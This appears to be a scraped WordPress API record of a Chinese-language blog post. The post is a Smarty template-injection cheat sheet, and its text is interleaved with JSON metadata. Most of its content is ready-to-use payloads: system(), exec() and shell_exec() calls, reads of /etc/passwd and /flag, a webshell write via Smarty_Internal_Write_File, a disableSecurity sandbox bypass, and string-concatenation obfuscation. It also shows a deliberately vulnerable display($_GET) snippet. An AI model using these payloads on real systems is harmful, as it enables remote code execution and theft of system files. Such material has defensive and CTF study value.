\u8bed\u6cd5\u6807\u7b7e\uff1a\u9ed8\u8ba4\u4f7f\u7528 \u5e38\u89c1payload\uff1a<\/p>\n \u547d\u4ee4\u6267\u884c\uff1a<\/p>\n \u6587\u4ef6\u8bfb\u53d6\uff08\u65e7\u7248\u672c\uff09\uff1a<\/p>\n \u5199Webshell<\/p>\n \u5229\u7528\u9759\u6001\u65b9\u6cd5\uff08CVE-2021-26119\uff09<\/p>\n \u5b57\u7b26\u4e32\u62fc\u63a5<\/p>\n math\u6807\u7b7e\u6267\u884c\u4ee3\u7801<\/p>\n fetch\u8bfb\u53d6\u6587\u4ef6<\/p>\n \u7f16\u7801\u6df7\u6dc6<\/p>\n \u5229\u7528 \u52a8\u6001\u8c03\u7528<\/p>\n \u5229\u7528display<\/p>\n \u5229\u7528{function}\u4e2d\u7684name\u5c5e\u6027<\/p>\n \u5236\u4f5c\u6076\u610f\u6570\u5b66\u5b57\u7b26\u4e32\u6765\u8fd0\u884c\u4efb\u610f PHP \u4ee3\u7801<\/p>\n smarty\u6a21\u677f\u6ce8\u5165 \u8bed\u6cd5\u6807\u7b7e\uff1a\u9ed8\u8ba4\u4f7f\u7528{ } \u6267\u884cphp\u8bed\u53e5\uff1a \u5e38\u89c1payload\uff1a {if phpinfo […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-68","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/68","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=68"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/68\/revisions"}],"predecessor-version":[{"id":101,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/68\/revisions\/101"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=68"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=68"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=68"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}{ }<\/code><\/p>\n\u6267\u884cphp\u8bed\u53e5\uff1a<\/h2>\n
{if phpinfo()}{\/if}\n{if system('ls')}{\/if}\n{if readfile('\/flag')}{\/if}\n{if show_source('\/flag')}{\/if}\n{if system('cat ..\/..\/..\/flag')}{\/if}<\/code><\/pre>\n{system('id')}\n{exec('cat \/etc\/passwd')}\n{shell_exec('whoami')}<\/code><\/pre>\n{include file='php:\/\/filter\/convert.base64-encode\/resource=\/etc\/passwd'}\n{self::getStreamVariable(\"file:\/\/\/etc\/passwd\")} # CVE-2017-1000480\n# php\u4e2d'->'\u8bbf\u95ee\u5bf9\u8c61\u7684\u5c5e\u6027\u548c\u65b9\u6cd5\uff0c'::'\u8bbf\u95ee\u7c7b\u7684\u9759\u6001\u6210\u5458\u6216\u5e38\u91cf<\/code><\/pre>\n{Smarty_Internal_Write_File::writeFile('\/path\/shell.php', '<?php phpinfo(); ?>')}\n<\/code><\/pre>\n\u6c99\u7bb1\u7ed5\u8fc7:<\/h2>\n
{$smarty.template_object->smarty->disableSecurity()->display('string:{system(\"id\")}')}<\/code><\/pre>\n{assign var='cmd' value='sy'|cat:'stem'}{$cmd('id')}<\/code><\/pre>\n{math equation='exec(\"id\")'}<\/code><\/pre>\n{fetch file=\"\/etc\/passwd\"}<\/code><\/pre>\n{assign var='cmd' value='s171stem'}{$cmd|replace:'\\':'','y':'s'}(id)<\/code><\/pre>\n{literal}<\/code>\u6807\u7b7e<\/p>\n{literal}{\/literal}{system('id')}{literal}{\/literal}<\/code><\/pre>\n{assign var='func' value='sys'.'tem'}{$func('id')}<\/code><\/pre>\n\/\/ \u5371\u9669\u4ee3\u7801\n$tpl = $_GET['data'];\n$smarty->display($tpl);\n\/\/\u6ce8\u5165\n?data=*\/phpinfo();\/\/<\/code><\/pre>\nstring:{function name='rce(){};phpinfo();function '}{\/function}<\/code><\/pre>\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"